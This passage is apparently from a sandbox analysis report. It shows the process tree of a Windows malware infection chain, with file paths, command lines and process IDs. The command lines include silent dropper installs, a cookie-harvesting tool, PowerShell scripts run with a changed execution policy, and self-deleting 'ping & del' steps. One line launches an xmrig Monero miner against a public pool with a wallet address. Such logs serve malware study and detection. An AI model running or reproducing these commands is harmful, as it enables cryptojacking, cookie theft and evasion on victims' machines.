        C:\Users\Admin\AppData\Local\Temp\is-OD0A3.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-OD0A3.tmp\lylal220.tmp" /SL5="$6038C,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
        10⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\is-9MIUN.tmp\4_177039.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-9MIUN.tmp\4_177039.exe" /S /UID=lylal220
        11⤵
        
        PID:7060
        
        C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe
        
        "C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe" /VERYSILENT
        12⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\is-E1PS0.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-E1PS0.tmp\irecord.tmp" /SL5="$5035E,6139911,56832,C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe" /VERYSILENT
        13⤵
        
        PID:7988
        
        C:\Program Files (x86)\recording\i-record.exe
        
        "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
        14⤵
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\a9-6988b-030-0db88-1f01da03bf0b2\Keborataelu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a9-6988b-030-0db88-1f01da03bf0b2\Keborataelu.exe"
        12⤵
        
        PID:8080
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 708
        13⤵
        
        PID:9236
        
        C:\Users\Admin\AppData\Local\Temp\8d-2a001-86e-72cb7-82c4ec0fd2034\ZHizhylaezhawe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8d-2a001-86e-72cb7-82c4ec0fd2034\ZHizhylaezhawe.exe"
        12⤵
        
        PID:8116
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe /s & exit
        13⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe /s
        14⤵
        
        PID:6572
        
        C:\Users\Admin\AppData\Local\Temp\463070101.exe
        
        C:\Users\Admin\AppData\Local\Temp\463070101.exe
        15⤵
        
        PID:8984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:9720
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:7036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:9976
        
        C:\Users\Admin\AppData\Local\Temp\1736394996.exe
        
        C:\Users\Admin\AppData\Local\Temp\1736394996.exe
        15⤵
        
        PID:5160
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe & exit
        13⤵
        
        PID:6844
        
        C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe
        
        C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe
        14⤵
        
        PID:7096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe & exit
        13⤵
        
        PID:1440
        
        C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe
        
        C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe
        14⤵
        
        PID:6408
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe /qn CAMPAIGN="654" & exit
        13⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe /qn CAMPAIGN="654"
        14⤵
        
        PID:6240
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe & exit
        13⤵
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe
        
        C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe
        14⤵
        
        PID:6392
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:5224
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:7676
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:9724
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        15⤵
        
        PID:1904
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe /s & exit
        13⤵
        
        PID:8136
        
        C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe
        
        C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe /s
        14⤵
        
        PID:8332
        
        C:\Users\Admin\AppData\Local\Temp\1139836490.exe
        
        C:\Users\Admin\AppData\Local\Temp\1139836490.exe
        15⤵
        
        PID:4680
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:10012
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        16⤵
        
        PID:9076
        
        C:\Users\Admin\AppData\Local\Temp\2045300393.exe
        
        C:\Users\Admin\AppData\Local\Temp\2045300393.exe
        15⤵
        
        PID:5136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe & exit
        13⤵
        
        PID:6468
        
        C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe
        14⤵
        
        PID:8964
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        15⤵
        
        PID:6780
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe & exit
        13⤵
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe
        14⤵
        
        PID:8344
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        15⤵
        
        PID:10156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        16⤵
        Kills process with taskkill
        
        PID:7420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe & exit
        13⤵
        
        PID:9168
        
        C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe
        14⤵
        
        PID:8552
        
        C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe"
        15⤵
        
        PID:8372
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe"
        16⤵
        
        PID:6400
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        17⤵
        Runs ping.exe
        
        PID:10072
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe"
        15⤵
        
        PID:8548
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        16⤵
        Delays execution with timeout.exe
        
        PID:9756
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe & exit
        13⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe
        14⤵
        
        PID:5992
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe"
        15⤵
        
        PID:10040
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        16⤵
        Runs ping.exe
        
        PID:9392
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe & exit
        13⤵
        
        PID:9284
        
        C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
        14⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
        15⤵
        
        PID:7940
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ffcxmbv.bn2\GcleanerWW.exe /mixone & exit
        13⤵
        
        PID:9704
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe /S & exit
        13⤵
        
        PID:10104
        
        C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe /S
        14⤵
        
        PID:7400
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa828C.tmp\tempfile.ps1"
        15⤵
        
        PID:7740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe & exit
        13⤵
        
        PID:9352
        
        C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe
        
        C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe
        14⤵
        
        PID:8476
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe /Verysilent /subid=623 & exit
        13⤵
        
        PID:9652
        
        C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe
        
        C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe /Verysilent /subid=623
        14⤵
        
        PID:10052
        
        C:\Users\Admin\AppData\Local\Temp\is-C9GGN.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C9GGN.tmp\Setup3310.tmp" /SL5="$3061A,138429,56832,C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe" /Verysilent /subid=623
        15⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\is-304EP.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-304EP.tmp\Setup.exe" /Verysilent
        16⤵
        
        PID:8764
        
        C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe
        
        "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"
        9⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Roaming\0fKEvFSz8WdOOJhO1SXjvDQP.exe
        
        "C:\Users\Admin\AppData\Roaming\0fKEvFSz8WdOOJhO1SXjvDQP.exe"
        10⤵
        
        PID:5160
        
        C:\Program Files (x86)\Company\NewProduct\setup.exe
        
        "C:\Program Files (x86)\Company\NewProduct\setup.exe"
        11⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Program Files (x86)\Company\NewProduct\setup.exe"
        12⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        13⤵
        Runs ping.exe
        
        PID:7536
        
        C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
        
        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
        11⤵
        
        PID:6804
        
        C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe
        
        "C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"
        11⤵
        
        PID:5960
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:7176
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:8092
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:5656
        
        C:\Program Files (x86)\Company\NewProduct\pwang.exe
        
        "C:\Program Files (x86)\Company\NewProduct\pwang.exe"
        11⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
        12⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Roaming\MFn9Hqf2nysTi1IvZpAg0YMj.exe
        
        "C:\Users\Admin\AppData\Roaming\MFn9Hqf2nysTi1IvZpAg0YMj.exe"
        10⤵
        
        PID:6024
        
        C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe
        
        "C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"
        11⤵
        
        PID:3788
        
        C:\Program Files (x86)\Company\NewProduct\pub02.exe
        
        "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
        11⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
        12⤵
        
        PID:7656
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        13⤵
        Runs ping.exe
        
        PID:8180
        
        C:\Program Files (x86)\Company\NewProduct\file4.exe
        
        "C:\Program Files (x86)\Company\NewProduct\file4.exe"
        11⤵
        
        PID:4804
        
        C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
        
        "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
        11⤵
        
        PID:5216
        
        C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
        
        "C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
        12⤵
        
        PID:7876
        
        C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe
        
        "C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe"
        10⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
        11⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
        12⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
        13⤵
        
        PID:2868
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe" /mix
        11⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe" /mix
        12⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe" /mix
        11⤵
        
        PID:6772
        
        C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe" /mix
        12⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 756
        13⤵
        Program crash
        
        PID:8812
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 772
        13⤵
        Program crash
        
        PID:6180
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1336
        13⤵
        Program crash
        
        PID:9160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1448
        13⤵
        Program crash
        
        PID:9444
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1548
        13⤵
        Program crash
        
        PID:9900
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1648
        13⤵
        Program crash
        
        PID:10180
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1540
        13⤵
        Program crash
        
        PID:4132
        
        C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
        
        edspolishpp.exe
        13⤵
        
        PID:9932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Rfl4p0hcnhV52BakENVQ9Y2x.exe" /f & erase "C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe" & exit
        11⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Rfl4p0hcnhV52BakENVQ9Y2x.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:8264
        
        C:\Users\Admin\AppData\Roaming\LVRpT2Ip4WKBXeXzG4nweWW5.exe
        
        "C:\Users\Admin\AppData\Roaming\LVRpT2Ip4WKBXeXzG4nweWW5.exe"
        10⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Roaming\I22ch8ZCpnXQU0SP6npsMc7f.exe
        
        "C:\Users\Admin\AppData\Roaming\I22ch8ZCpnXQU0SP6npsMc7f.exe"
        10⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\aM4siWPMDOXLi6DMEbjjx47v.exe
        
        "C:\Users\Admin\AppData\Roaming\aM4siWPMDOXLi6DMEbjjx47v.exe"
        10⤵
        
        PID:5312
        
        C:\Users\Admin\AppData\Roaming\xmrig.exe
        
        "C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
        11⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe
        
        "C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe"
        10⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
        11⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
        12⤵
        
        PID:6240
        
        C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
        13⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe" /mix
        11⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe" /mix
        12⤵
        
        PID:5788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 600
        13⤵
        Program crash
        
        PID:8468
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 612
        13⤵
        Program crash
        
        PID:8804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 624
        13⤵
        Program crash
        
        PID:7320
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 668
        13⤵
        Program crash
        
        PID:9784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 708
        13⤵
        Program crash
        
        PID:8408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe" /mix
        11⤵
        
        PID:6148
        
        C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe" /mix
        12⤵
        
        PID:896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 756
        13⤵
        Program crash
        
        PID:8712
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 768
        13⤵
        Program crash
        
        PID:9112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1208
        13⤵
        Program crash
        
        PID:2500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1432
        13⤵
        Program crash
        
        PID:9416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1512
        13⤵
        Program crash
        
        PID:9672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1552
        13⤵
        Program crash
        
        PID:9972
        
        C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
        
        edspolishpp.exe
        13⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "v1XyV0Ex2EIlfaGif3UMY4gP.exe" /f & erase "C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe" & exit
        11⤵
        
        PID:5360
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "v1XyV0Ex2EIlfaGif3UMY4gP.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:800
        
        C:\Users\Admin\AppData\Roaming\LzE1sD11VIqjLgwPPWWkHM1B.exe
        
        "C:\Users\Admin\AppData\Roaming\LzE1sD11VIqjLgwPPWWkHM1B.exe"
        10⤵
        
        PID:3988
        
        C:\Users\Admin\AppData\Roaming\Ad2Qn4FoxMBqArw5VXwEnGAA.exe
        
        "C:\Users\Admin\AppData\Roaming\Ad2Qn4FoxMBqArw5VXwEnGAA.exe"
        10⤵
        
        PID:6020
        
        C:\Users\Admin\AppData\Roaming\ayaMApDQyzsQBMBPaC11Yxkn.exe
        
        "C:\Users\Admin\AppData\Roaming\ayaMApDQyzsQBMBPaC11Yxkn.exe"
        10⤵
        
        PID:5980
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        11⤵
        
        PID:5500
        
        C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe
        
        "C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe"
        10⤵
        
        PID:4668
        
        C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe
        
        "{path}"
        11⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Roaming\APKyR1agzyB7kUuDb4YvcWc7.exe
        
        "C:\Users\Admin\AppData\Roaming\APKyR1agzyB7kUuDb4YvcWc7.exe"
        10⤵
        
        PID:4196
        
        C:\Users\Admin\AppData\Roaming\wl1st4doKgqoDaekUPWw4gxB.exe
        
        "C:\Users\Admin\AppData\Roaming\wl1st4doKgqoDaekUPWw4gxB.exe"
        10⤵
        
        PID:2668
        
        C:\Users\Admin\AppData\Roaming\2G4ojIS88DbgIIT83ef6JlrT.exe
        
        "C:\Users\Admin\AppData\Roaming\2G4ojIS88DbgIIT83ef6JlrT.exe"
        10⤵
        
        PID:200
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe" /S
        11⤵
        
        PID:5636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
        PID:7792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
        PID:8024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
        12⤵
        
